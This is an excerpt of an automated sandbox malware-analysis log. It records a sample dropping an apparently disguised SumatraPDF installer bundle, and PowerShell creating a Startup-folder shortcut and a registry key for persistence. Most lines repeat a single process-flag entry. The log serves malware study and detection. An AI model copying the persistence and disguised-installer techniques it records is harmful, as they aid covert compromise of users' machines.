      Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webpImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_UP source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFEB7C61C7D push eax; retf 17_2_00007FFEB7C61C7E
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53q2yv23ir3.lnkJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53q2yv23ir3.lnkJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER_Classes\rfg1dcnqkaz NULLJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
